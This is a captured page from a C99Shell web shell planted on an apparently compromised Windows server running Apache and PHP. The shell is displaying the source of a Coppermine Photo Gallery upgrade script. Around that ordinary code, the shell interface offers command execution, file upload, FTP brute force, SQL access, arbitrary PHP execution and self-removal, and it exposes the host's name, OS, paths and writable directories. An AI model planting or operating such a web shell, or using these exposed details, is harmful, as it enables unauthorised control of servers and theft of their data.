!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\cpg1418\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     upgrade-1.0-to-1.2.php (3.04 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*************************
  Coppermine Photo Gallery
  ************************
  Copyright (c) 2003-2008 Dev Team
  v1.1 originally written by Gregory DEMAR

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License version 3
  as published by the Free Software Foundation.
  
  ********************************************
  Coppermine version: 1.4.18
  $HeadURL: https://coppermine.svn.sourceforge.net/svnroot/coppermine/trunk/cpg1.4.x/upgrade-1.0-to-1.2.php $
  $Revision: 4380 $
  $Author: gaugau $
  $Date: 2008-04-12 12:00:19 +0200 (Sa, 12 Apr 2008) $
**********************************************/

define('IN_COPPERMINE'true);
define('ADMIN_PHP'true);

require 
"include/init.inc.php";

if (!
GALLERY_ADMIN_MODEcpg_die(ERROR$lang_errors['access_denied'], __FILE____LINE__);

$db10 ""// DB in which Coppermine 1.0 tables resides (leave blank is same DB as v1.2)
$prefix10 "CPG_"// The prefix used for the Coppermine 1.0 tables
$prefix10 = ($db10 $db10 '.' '') . $prefix10;

$CPG_pictures $prefix10 "pictures";
$CPG_albums $prefix10 "albums";
$CPG_comments $prefix10 "comments";

$cpg11_pictures $CONFIG['TABLE_PICTURES'];
$cpg11_albums $CONFIG['TABLE_ALBUMS'];
$cpg11_comments $CONFIG['TABLE_COMMENTS'];

echo 
"Upgrading Coppermine 1.0 tables to 1.1<br />";
echo 
"Prefix used for 1.0 tables : $prefix10<br /><br />";
// Upgrade for the picture table
$sql "INSERT INTO $cpg11_pictures " "(approved, pid, aid, caption, filepath, filename, filesize, pwidth, pheight, hits, mtime," " ctime) " "SELECT 'yes' as approved, p.pid, aid, msg_body AS caption, filepath, filename, filesize, " "pwidth, pheight, hits, mtime, UNIX_TIMESTAMP(ctime)" "FROM $CPG_pictures AS p " "LEFT JOIN $CPG_comments AS c ON p.caption = c.msg_id ";
cpg_db_query($sql);
echo 
"Picture table upgraded<br />";
// Get the list of comments that are used a image captions
$sql "SELECT msg_id FROM $CPG_pictures AS p, $CPG_comments AS c " "WHERE p.caption = c.msg_id";
$result cpg_db_query($sql);
$msg_id_set '';
if ((
mysql_num_rows($result))) {
    
$set '';
    while (
$comment mysql_fetch_array($result)) {
        
$set .= $comment['msg_id'] . ',';
    } 
// while
    
$msg_id_set 'AND msg_id NOT IN (' substr($set0, -1) . ') ';
}
mysql_free_result($result);
// Upgrade the comment table
$sql "INSERT INTO $cpg11_comments " "(pid, msg_id, msg_author, msg_body, msg_date)" "SELECT pid, msg_id, msg_author, msg_body, msg_date " "FROM $CPG_comments " "WHERE 1 $msg_id_set";
cpg_db_query($sql);
echo 
"Comment table upgraded<br />";
// Upgrade the album table
$sql "INSERT INTO $cpg11_albums " "(aid, title, description, uploads, pos)" "SELECT aid, title, description, uploads, UNIX_TIMESTAMP(date) " "FROM $CPG_albums";
cpg_db_query($sql);
echo 
"Album table upgraded<br />";
echo 
"<br />First step of upgrade completed!<br />";

echo 
"<a href='update.php'>Click Here</a> to complete the 1.2 upgrade.</P>";

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--